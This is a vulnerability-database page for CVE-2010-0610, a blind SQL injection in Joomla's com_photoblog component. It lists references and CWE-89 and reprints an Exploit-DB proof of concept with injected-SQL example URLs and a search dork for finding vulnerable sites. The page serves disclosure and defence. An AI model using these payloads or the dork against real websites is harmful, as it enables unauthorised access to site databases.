CVE-2010-0610
Description
Multiple SQL injection vulnerabilities in the Photoblog (com_photoblog) component for Joomla! allow remote attackers to execute arbitrary SQL commands via the blog parameter in an images action to index.php. NOTE: a separate vector for the id parameter to detail.php may also exist.
Predictions
Heuristic predictions, AS-IS, for prioritization only.
Mitigations
No mitigations published for this CVE yet.
The vendor-content worker queues fetches as references arrive (check back in a few minutes). Or โ if you've already worked around this in production โ publish your fix to the community-verified tier.
โ Propose a mitigation on Community โ Mitigations published via the community go through AI scoring + 2 human reviewers + 7-day silent objection window before landing here withsource_tier=community-verified.
Exploits
Public proof-of-concept code below. AS-IS, for defenders and authorised testing only.
Exploit-DB
Joomla! Component com_photoblog - Blind SQL Injection
Joomla (com_photoblog) Blind Sql Injection Vulnerability
========================================================
####################################################################
.:. Author : ALTBTA [L_9@HoTmIL.CoM]
.:. Home : v4-team.com/cc<http://v4-team.com/cc>
.:. Script : Joomla
.:. Download Script: http://webguerilla.net/downloads/3-components-for-joomla-1
.:. Bug Type : Blind Sql Injection
.:. Dork : inurl:"com_photoblog"
####################################################################
===[ Exploit ]===
www.site.com/detail.php?id=[Blind<http://www.site.com/detail.php?id=[Blind> SQL INJECTION]
www.site.com/index.php?option=com_photoblog&view=images&category=1&celebs&blog=1+and<http://www.site.com/index.php?option=com_photoblog&view=images&category=1&celebs&blog=1+and> substring(@@version,1,1)=5
####################################################################
Greats T0: aB0-3tH4b T3rR0r & RxHApplication impact
| Vendor | Product | Versions | Fixed |
|---|---|---|---|
| webguerilla | com_photoblog | | |
| joomla | joomla\! | 1.5.0 | |
References
- http://packetstormsecurity.org/1002-exploits/joomlaphotoblog-bsql.txt
- http://www.exploit-db.com/exploits/11337
- http://www.securityfocus.com/bid/38136
- https://exchange.xforce.ibmcloud.com/vulnerabilities/56135
- http://packetstormsecurity.org/1002-exploits/joomlaphotoblog-bsql.txt
- http://www.exploit-db.com/exploits/11337
- http://www.securityfocus.com/bid/38136
- https://exchange.xforce.ibmcloud.com/vulnerabilities/56135
CWEs
CWE-89
Community-verified mitigations for this CVE will appear above when contributors publish them.
Verify integrity in audit chain (admin only). AS-IS.